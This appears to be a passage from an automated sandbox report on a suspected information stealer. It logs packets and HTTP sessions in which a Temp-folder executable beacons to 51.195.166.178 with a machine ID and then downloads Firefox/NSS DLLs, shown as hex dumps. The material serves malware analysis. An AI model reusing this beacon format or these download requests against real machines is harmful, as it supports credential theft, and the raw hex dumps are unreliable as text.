                                       Aug 5, 2022 13:54:13.121846914 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121861935 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121895075 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151041031 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151124001 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151187897 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151228905 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151247025 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151263952 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151330948 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151417971 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151464939 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151509047 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151549101 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151549101 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151590109 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151628017 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151631117 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151664972 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151704073 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151705980 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151742935 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151782036 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151782036 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151822090 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151859045 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151864052 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151897907 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151935101 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.151937008 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.151973963 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.152012110 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.152015924 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.152050018 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.152072906 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.152089119 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.152117014 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.152127981 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.152137041 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.152179003 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.152218103 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                      • 51.195.166.178
                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                       0 | 192.168.2.4 | 49778 | 51.195.166.178 | 80 | C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                       Timestamp | kBytes transferred | Direction | Data
                                       Aug 5, 2022 13:54:12.723336935 CEST | 1239 | OUT | POST / HTTP/1.1
                                      Accept: */*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: mozzzzzzzzzzz
                                      Host: 51.195.166.178
                                      Content-Length: 94
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=517bb0d640c1242c3f069aab3d1018d6
                                       Aug 5, 2022 13:54:12.825297117 CEST | 1241 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:12 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 5278
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Vary: Accept-Encoding
                                      Vary: Accept-Encoding
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"149e-TUdOV6RAkxaWAE5TjHnQPtGZ6P4"
                                      Data Ascii: libs_nss3:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlllibs_msvcp140:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllibs_vcruntime140:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlllibs_mozglue:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4
                                       Aug 5, 2022 13:54:13.039436102 CEST | 1246 | OUT | GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                       Aug 5, 2022 13:54:13.091945887 CEST | 1248 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:13 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 2042296
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT
                                      ETag: "62543db4-1f29b8"
                                      Accept-Ranges: bytes
                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!&`@A!\T@@xPhh\!@.texti `.rdata@@.dataN*@.00cfg0@@.rsrcx@@@.relochP@BUSWV]u~t@p0W~1
                                      Aug 5, 2022 13:54:15.471147060 CEST11263OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:15.523406982 CEST11264INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:15 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 449280
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 14:39:42 GMT
                                      ETag: "62543dae-6db00"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a2 00 10 a0 a2 00 10 80 a2 00 10 e0 a2 00 10 90 a3 00 10 30 a3 00 10 10 a3 00 10 70 a3 00 10 30 a4 00 10 d0 a3 00 10 b0 a3 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL(["!(`@@Agr?=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B0p0
                                      Aug 5, 2022 13:54:17.446722031 CEST11735OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:17.499272108 CEST11736INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:17 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 80128
                                      Connection: keep-alive
                                      Last-Modified: Sat, 28 May 2022 16:52:46 GMT
                                      ETag: "6292535e-13900"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 
00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 27 00 00 02 e0 27 00 00 02 60 2d 00 00 02 e0 32 00 00 02 40 34 00 00 02 70 35 00 00 02 b0 36 00 00 02 28 39 00 00 01 f8 39 00 00 01 04 3b 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL(["!0t(@A? 8 @.text `.data@.idata@@.rsrc@@.reloc @B0''`-2@4p56(99;
                                      Aug 5, 2022 13:54:18.749895096 CEST11820OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:18.802898884 CEST11821INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:18 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 627128
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 14:39:36 GMT
                                      ETag: "62543da8-991b8"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 ec 08 89 ce 8b 5d 08 a1 0c 30 09 10 31 e8 89 45 f0 53 e8 8a 14 08 00 83 c4 04 89 c7 8b 46 14 39 f8 73 30 83 ec 0c 8a 45
                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!V/@AcQ,pr4CWh0.text `.rdata0@@.data0@.00cfgP @@.tls`"@.rsrcp$@@.reloc4CD.@BUSWV]01ESF9s0E
                                      Aug 5, 2022 13:54:19.432562113 CEST12482OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:19.484570980 CEST12483INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:19 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 684984
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 14:40:08 GMT
                                      ETag: "62543dc8-a73b8"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 32 19 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 07 19 08 00 83 c4 04
                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL&9b"!6@A4,S,xT8$&0.D.text `.rdata0@@.data<F@&@.00cfg(@@.rsrcx*@@.reloc8$&.@BUhO2t8]h
